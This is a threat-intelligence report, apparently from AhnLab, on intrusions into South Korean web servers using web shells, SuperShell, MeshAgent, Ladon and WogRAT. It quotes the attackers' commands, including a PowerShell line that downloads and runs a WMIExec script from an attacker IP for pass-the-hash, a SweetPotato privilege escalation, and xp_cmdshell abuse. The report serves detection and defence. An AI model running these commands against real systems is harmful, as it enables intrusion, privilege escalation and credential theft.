Case of Attacks Targeting South Korean Web Servers Using MeshAgent and SuperShell
Lately, attacks on South Korean web servers utilizing MeshAgent and SuperShell have been identified. The presence of ELF-based malware at the malicious code distribution address suggests that the attackers are targeting not only Windows servers but also Linux servers. It is assumed that the attackers installed a web shell using a file upload vulnerability and used it to install additional payloads. Through reconnaissance and lateral movement, the attackers attempted to infect not only the compromised system but also other systems within the organization.
The malicious code distribution address used in the attacks also contained WogRAT. Similar to Rekoobe, WogRAT is a backdoor malware that was developed by referencing the routine of an open-source malware called “Tiny SHell.” The fact that the C&C server address of the recently identified WogRAT is the same as that of the WogRAT used in the past attack cases that exploited aNotepad suggests that both cases were likely carried out by the same attacker.
Most of the malware, including the web shell used in the attacks, are public tools. Therefore, based on the tools used, the attackers can only be identified in terms of the association between the two cases. However, it is noteworthy that malware like Ladon, Fscan, MeshAgent, and SuperShell have been commonly used tools by Chinese-speaking attackers in the past.
Figure 1. Flowchart
1. Initial Access
The initial access is unknown, but the presence of web shell in the following paths indicates that the attack exploited file upload vulnerabilities of the web server. The attacker used the installed web shell to run reconnaissance commands and install additional payloads.
| D:\WEB\*******\******\Data\Editor\File\g.asp D:\WEB\*******\******\Data\Editor\File\test6\aa.asp D:\WEB\*******\******\Data\Editor\File\test6\ab.asp D:\WEB\*******\******\Data\Editor\File\test9\1.aspx D:\WEB\*******\******\Data\Editor\File\test9\1.aspx D:\WEB\*******\******\Data\Editor\File\test9\tunnel1.aspx |
2. Persistence
In the initial penetration stage, attackers install web shells to control the compromised system and use them to maintain persistence for executing commands. As the target is a Windows IIS web server, the web shells used are all in ASP and ASPX formats. The attack logs include logs of various web shells such as Chopper, Godzilla, and ReGe-ORG.
Figure 2. Web Shells Used in the Attack
3. Discovery
After installing the web shell, the attacker used the following commands to collect information on the infected system.
| > ipconfig > whoami > whoami /all > systeminfo > netstat -ano > query user > tasklist /svc > ping -nc 1 [IP Address] |
Scan the network including the infected system using Fscan.
| > fscan.exe -hf i.txt -nocolor -silent -o rr8.txt > fscan.exe -hf a.txt -nocolor -silent -p 445,135,22 -o rr6.txt |
igure 3. Fscan Tool Developed in Chinese
4. Privilege Escalation
During the privilege escalation process, Ladon was abused. Ladon is also a tool mainly used by Chinese-speaking attackers. It supports various functions required for the attack process, so attackers can use Ladon to perform various malicious activities such as scanning, privilege escalation, and stealing account information after taking over the victim system. In addition to the executable file format of Ladon, there is also PowerLadon written in PowerShell. PowerLadon was used in the attack case.
Attackers tend to use privilege escalation malware in the attack process even if they can run commands on the infected system through a web shell because the w3wp.exe process does not have the required permissions. In this attack case, the attackers used the SweetPotato command supported by Ladon to escalate privileges.
| > powershell -exec bypass Import-Module .\Ladon.ps1;Ladon SweetPotato whoami |
5. Command and Control
The attacker installed SuperShell and MeshAgent besides the web shell to control the infected system. The attacker also installed a proxy tool. SuperShell is developed in Go language and supports various platforms including Windows, Linux, and Android. Its main function is a reverse shell, allowing the attacker to remotely control the infected system. SuperShell has been exploited in cases of attacks against Linux servers with improper management, and cases of APT attackers like UNC5174 using it have been reported. [1] [2]
Figure 4. SuperShell Repository on GitHub
MeshAgent collects the system’s basic information required for remote management and provides functions such as power and account control, chat or message pop-up, file upload/download, and command execution. In addition, it supports remote desktop, especially web-based remote desktop functions such as RDP and VNC. While general users may use it to manage systems remotely, these functions can also be exploited for malicious purposes.
Figure 5. MeshAgent’s Configuration File and C&C Server
The IP address where the attacker downloaded the malware also includes Linux server-targeting malware. For example, SuperShell was uploaded along with an ELF malware in addition to PE format malware, and WogRAT was confirmed. WogRAT is a malware that was distributed by exploiting a free online notepad platform, aNotepad, in the past. The malware is characterized by the string “WingsOfGod,” which the attacker used to create the malware. WogRAT has both Windows and Linux versions, and the Linux version was developed by adopting the routine of an open-source malware called Tiny SHell, similar to Rekoobe. Detailed analysis information on WogRAT is available on the existing blog. [3]
The fact that WogRAT’s C&C server IP address is the same domain as the past cases suggests that the two attacks are suspected to be the work of the same attacker. In the past cases, the malware was distributed under names disguised as legitimate utilities for Windows systems, but the difference in the confirmed cases is that they attacked vulnerable web servers.
6. Credential Access
To move laterally to infect systems and take over the network where the infected system is located, the attackers need to steal credentials. Lateral movement using WMIExec and Ladon tools has been confirmed, indicating that the attackers successfully stole credentials. Attackers may have used various methods, but one confirmed tool is Network Password Dump, which collects and shows network authentication information stored in the system.
Figure 6. Network Password Dump Tool
7. Lateral Movement
The attacker successfully obtained the NT hash of an admin account and used it to move laterally to other systems within the organization using WMIExec.
| > IEX (New-Object Net.WebClient).DownloadString(‘hxxp://139.180.142[.]127/Invoke-WMIExec.ps1’);Invoke-WMIExec -Target [IP] -Domain [Domain] -Username Administrator -Hash [Hash] -Command ‘whoami’ -verbose |
In addition, MS-SQL Server was targeted as well. The following Ladon command for lateral movement using a file was identified.
| > powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon Runas [User] [Password] whoami > powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd [IP] [User] [Password] master xp_cmdshell “net user |
8. Conclusion
Recently, cases have been confirmed where attacks on Korean IIS web servers are suspected to be perpetrated by the same attacker behind the WogRAT attacks. The attacker seems to target not only Windows but also Linux, attempting to take control of the network where the infected system belongs by moving from the initial penetration phase to the lateral movement phase. While the ultimate goal is unknown, the attacker may steal sensitive information or infect the network with ransomware if they successfully take control of the organization’s network.
Gain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click the banner below.
